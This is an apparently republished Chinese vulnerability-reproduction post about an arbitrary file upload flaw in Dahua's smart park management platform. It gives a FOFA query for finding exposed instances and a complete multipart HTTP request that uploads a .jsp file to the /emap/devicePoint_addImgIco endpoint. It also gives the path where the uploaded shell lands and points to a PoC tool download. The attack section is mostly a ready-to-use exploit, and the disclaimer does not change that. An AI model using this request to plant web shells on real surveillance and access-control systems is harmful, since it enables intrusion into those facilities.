大华智慧园区综合管理平台存在任意文件上传漏洞
大华智慧园区综合管理平台存在任意文件上传漏洞。该漏洞未对文件类型、大小、格式和路径进行严格限制和过滤,攻击者可通过构造恶意文件上传至设备上造成潜在危害。平台具备视频监控、报警系统等功能,并通过漏洞复现工具(如POC)进行验证与演示。厂商尚未提供相关补丁链接,请关注官方更新以修复此漏洞并防止潜在安全风险。此外,该漏洞已引起关注(如往期回顾中的其他类似问题)。
大华智慧园区综合管理平台存在任意文件上传漏洞
免责声明:请勿运用文章中的相关技术进行不当测试。由于传播或使用本文提供的信息或工具所引发的任何直接或间接的后果及损失,请使用者自行承担。该文章仅限于学习目的使用。
1. 大华智慧园区综合管理平台简介
通过微信公众号搜索平台访问'南风漏洞复现文库'。其中,《南风漏洞复现文库》作为一篇重要的文章,在本平台首次发布。
大华智慧园区综合管理平台主要用于整合四个安全监控系统的视频采集、报警报备、门禁管控和对讲通讯等功能。
2.漏洞描述
大华智慧园区综合管理平台是一种集成了多种功能的管理系统,在园区运营协调、资源调配优化以及智能化服务方面具有显著优势
CVE编号:
CNNVD编号:
CNVD编号:
3.影响版本

4.fofa查询语句
"/WPMS/asset/lib/gridster/"
5.漏洞复现
漏洞数据包:
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
1657966889
--f3aeb22be281d77542546a2f71e20982--
AI助手

shell地址链接:http://127.0.0.1/upload/emap/society_new/ico_res_f61fad3abc99_on.jsp
ico_res_f61fad3abc99_on.jsp 替换成你们上传数据包回显的文件名

6.POC&EXP
请关注南风漏洞复现文库,并回复'漏洞复现41'即可获取该POC工具的下载地址

7.整改意见
目前厂商尚未发布漏洞修复说明文档,请访问其官方主页持续关注最新动态:https://www.dahuatech.com/
8.往期回顾
艾科思(霆智科技)应用接入系统的功能模块中可能存在文件读取权限配置不当的问题
目前/nginxWebUI 存在远程操作权限漏洞 "https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484097&idx=1&sn=692796cbd73f3dc81074880f34fcabc4&chksm=974b8fc6a03c06d0d12766a6886d6e64736fe5c7181684794db75dc7d828cbb104dacbce6a62&scene=21#wechat_redirect
